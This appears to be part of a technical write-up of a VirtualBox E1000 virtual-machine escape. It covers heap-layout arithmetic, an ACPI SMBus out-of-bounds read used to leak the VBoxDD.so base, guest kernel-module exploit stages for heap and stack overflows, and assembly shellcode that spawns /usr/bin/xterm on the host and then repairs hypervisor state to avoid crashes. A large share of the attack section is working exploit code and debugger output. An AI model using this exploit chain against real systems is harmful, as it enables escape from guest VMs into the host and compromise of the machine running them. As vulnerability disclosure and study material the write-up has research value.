[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

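The E1000 device is at position #0xE. The device after it is at offset 0x5700 from E1000, the next one is 0x19E0 further, and so on (as noted above, these distances are always the same).

E1000 is followed by ICH AC'97, OHCI, ACPI, and VirtualBox GIM.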
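The distances can be recomputed from the instance addresses in the trace. The addresses in this sketch are copied from that single GDB session and will differ on every boot because of ASLR; only the differences are expected to stay the same. The constant and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Instance addresses copied from the trace above (one particular boot). */
const uint64_t inst_e1000   = 0x7fc470083400ULL;
const uint64_t inst_ichac97 = 0x7fc470088b00ULL;
const uint64_t inst_ohci    = 0x7fc47008a4e0ULL;
const uint64_t inst_acpi    = 0x7fc47008be70ULL;

/* Distance in bytes from one device instance to a later one. */
uint64_t distance(uint64_t from, uint64_t to)
{
    return to - from;
}
```

Summing the three steps gives the distance from the E1000 instance to the ACPI instance, 0x8A70 in this trace, which is the kind of constant an exploit can hard-code.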

The ACPI device is created when the virtual machine starts (src/VBox/Devices/PC/DevACPI.cpp):

typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

An ACPI port I/O handler is registered for the range 0x4100-0x410F. For port 0x4107 it does the following:

PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

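When the guest OS executes INB(0x4107) to read one byte from the port, the handler takes the byte at index u8SMBusBlkIdx from the au8SMBusBlkDat[32] array and returns it to the guest. This is where the write primitive comes in: because the distances between the heap blocks of the virtual devices are constant, the distance from the EEPROM93C46.m_au16Data array to ACPIState.u8SMBusBlkIdx is constant too. By writing two bytes over ACPIState.u8SMBusBlkIdx, arbitrary data within 255 bytes of ACPIState.au8SMBusBlkDat can be read.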
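The handler's read-then-mask order is what makes this work, and a small model shows it. The sketch uses a flat byte arena in place of the heap so that the out-of-range read is well defined; `smbus_model` and `smbus_read_byte` are hypothetical names, while the three steps inside the function mirror the SMBBLKDAT_OFF case shown above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define BLK_DAT_SIZE 32u

/* Flat byte arena standing in for the heap: the 32-byte block buffer
 * starts at `blk_off`, and whatever follows it is reachable by index. */
struct smbus_model {
    const uint8_t *arena;
    size_t blk_off;
    uint8_t idx;            /* plays the role of u8SMBusBlkIdx */
};

/* Read at idx, then increment and mask. The mask is applied only after
 * the read, so an out-of-range idx planted from outside is used once
 * before being wrapped back into 0..31. */
uint8_t smbus_read_byte(struct smbus_model *m)
{
    uint8_t v = m->arena[m->blk_off + m->idx];
    m->idx++;
    m->idx &= BLK_DAT_SIZE - 1u;
    return v;
}
```

Because the index is forced back into range after every read, each leaked byte needs the index to be planted again, which matches the exploit code later in the article overflowing the heap once per leaked byte.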

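Looking at the ACPIState structure, the array sits at the end of the structure and the remaining fields are of little use, so the interesting data is whatever lies past the structure: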

gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0:	0xffffe98100000090	0xfffd9b2000000000
0x7fc47008d4f0:	0x00007fc470067a00	0x00007fc470067a00
0x7fc47008d500:	0x00000000a0028a00	0x00000000000e0000
0x7fc47008d510:	0x00000000000e0fff	0x0000000000001000
0x7fc47008d520:	0x000000ff00000002	0x0000100000000000
0x7fc47008d530:	0x00007fc47008c358	0x00007fc44d6ecdc6
0x7fc47008d540:	0x0031000035944000	0x00000000000002b8
0x7fc47008d550:	0x00280001d3878000	0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6:	"ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

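There is a pointer to a string that sits at a fixed offset inside VBoxDD.so; the pointer itself is at offset 0x58 past the end of ACPIState. We can read this pointer byte by byte and eventually obtain the VBoxDD.so image base. This relies on the data past the ACPIState structure not being random between virtual machine boots.

Information leak

Now the write and read primitives are combined to bypass ASLR. We overflow the heap to overwrite the EEPROM93C46 structure, trigger the EEPROM to write the index into the ACPIState structure, and execute INB(0x4107) in the guest to read one byte of the pointer through ACPI. This is repeated 8 times, incrementing the index by 1 each time.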

uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");

    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);

    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();

        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }

    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);

    return vboxdd_base;
}

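In loopback mode the guest sends packets back to itself, so they are received immediately after being sent. With this mode disabled, e1kHandleRxPacket is unreachable.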
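The last two steps of the leak, assembling the pointer and subtracting the RVA, can be checked against the GDB session shown earlier. This sketch builds the value with shifts instead of casting the byte array to a 64-bit pointer; the helper names are hypothetical, and the sample values in the note below come from that one debugging session.

```c
#include <assert.h>
#include <stdint.h>

/* Assemble eight leaked bytes, least significant byte first
 * (x86_64 stores pointers in little-endian order). */
uint64_t assemble_le64(const uint8_t bytes[8])
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | bytes[i];
    return v;
}

/* Image base = leaked pointer minus its known offset inside the image. */
uint64_t image_base(uint64_t leaked_ptr, uint64_t rva)
{
    return leaked_ptr - rva;
}
```

For the leaked pointer 0x00007fc44d6ecdc6 and the RVA 0x1f9dc6 printed by GDB, the result is 0x00007fc44d4f3000, the start address that vmmap reports for VBoxDD.so.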

DEP

With ASLR bypassed, loopback mode can be enabled and the stack buffer overflow triggered.

void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);

    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);

    free_buffer(buffer_va);
}

void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");

    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

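By the time the last instruction of e1kHandleRxPacket executes, the saved return address has been overwritten and the attacker can transfer control to any address. DEP still has to be bypassed, which is done by building a ROP chain.

Shellcode

The shellcode loader is simple.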

use64

start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop

payload:
    ; Here the shellcode is to be

loader_size = $ - start

Once the shellcode runs, its first part is:

use64

start:
    ; sys_fork in the original; note that 58 is vfork on x86_64 Linux (fork is 57)
    mov rax, 58
    syscall

    test rax, rax
    jnz continue_process_execution

    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi

    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi

    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall

...

cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

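fork and execve are used to create a /usr/bin/xterm process, which gives the attacker ring 3 control.

Process continuation

The goal is not a denial of service: the hypervisor should keep running afterwards. The second part of the shellcode takes care of that: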

continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48

    ; Skip junk
    add rsp, 0x10

    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15

    ; Skip junk
    add rsp, 0x8

    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL

    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb

    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0

    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted

    ret

When e1kHandleRxPacket is called, the call stack is:

#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

The shellcode returns straight into e1kR3NetworkDown_XmitPending, which does nothing further and returns to the hypervisor.

static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

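The shellcode sets RBP to RSP + 0x48 so that it holds the value expected in e1kR3NetworkDown_XmitPending. Then the registers RBX, R12, R13, R14, and R15 are popped from the stack; the System V ABI requires a callee to preserve them, and the hypervisor would crash otherwise.

That is almost enough: the virtual machine no longer crashes and keeps running. However, when the virtual machine is shut down, an access violation occurs in PDMR3QueueDestroyDevice, because a PDMQUEUE structure is overwritten by the heap overflow (and by the ROP chain). This problem was harder to solve.

The overwritten structure belongs to a linked list and sits at the tail end of it.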

; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

Once the last two elements are dealt with, the virtual machine shuts down normally.
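The idea behind the fix, cutting the list before the corrupted elements so that teardown never follows them, looks like this in C. The `queue_node` structure is a hypothetical stand-in; the real PDMQUEUE has many more fields and the shellcode performs the equivalent steps in assembly.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a queue node. */
struct queue_node {
    struct queue_node *next;
    const char *name;
};

/* Cut the list after `keep`, so teardown never follows corrupted links. */
void truncate_after(struct queue_node *keep)
{
    keep->next = NULL;
}

/* Count nodes by walking the list the way a teardown routine would. */
size_t list_length(const struct queue_node *head)
{
    size_t n = 0;
    for (; head != NULL; head = head->next)
        n++;
    return n;
}
```

Starting from "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1", calling `truncate_after` on the first node leaves a one-element list, matching the Before/After comment in the shellcode.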

 

References

https://github.com/MorteNoir1/virtualbox_e1000_0day
